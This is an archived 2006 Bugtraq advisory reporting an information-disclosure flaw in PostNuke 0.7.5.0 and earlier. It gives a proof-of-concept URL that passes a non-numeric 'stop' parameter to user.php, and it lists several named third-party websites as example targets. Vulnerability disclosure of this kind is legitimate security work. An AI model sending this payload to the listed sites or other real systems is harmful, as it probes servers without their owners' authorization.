Vulnerability in PostNuke

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Vulnerability in PostNuke
From: sni-labs@xxxxxxxxxxxx
Date: Wed, 22 Nov 2006 00:34:16 +0200
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Sender: www-data <www-data@xxxxxxxxxxxxxxxxxxx>
User-agent: Internet Messaging Program (IMP) H3 (4.0.4)

Error PostNuke in the variable stop which can be exploited by maliciouspeople to disclose system information. Luckily the vulnerabilityaffects to the 0.7.5.0 version and minors.


POC:
http://www.[web-with-PostNuke].com/user.php?stop=a (no numeric value)
Example:
http://www.dev-postnuke.com/user.php?stop=a
http://www.americavivetv.com/user.php?stop=a
http://www.ciberpsique.net/user.php?stop=a

http://www.bonsaiabm.com/user.php?stop=ahttp://www.elrincondejada.net/user.php?stop=ahttp://www.salsa.org.pl/user.php?stop=ahttp://www.choco.org/user.php?stop=a



by rMrGvG

http://SNI-LABS.com
since 1998

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.

Prev by Date: Clarifying integer overflows vs. signedness errors
Next by Date: Advisory: Seditio <= 1.10 Remote SQL Injection Vulnerability.
Previous by thread: Re: Clarifying integer overflows vs. signedness errors
Next by thread: Advisory: Seditio <= 1.10 Remote SQL Injection Vulnerability.
Index(es):
- Date
- Thread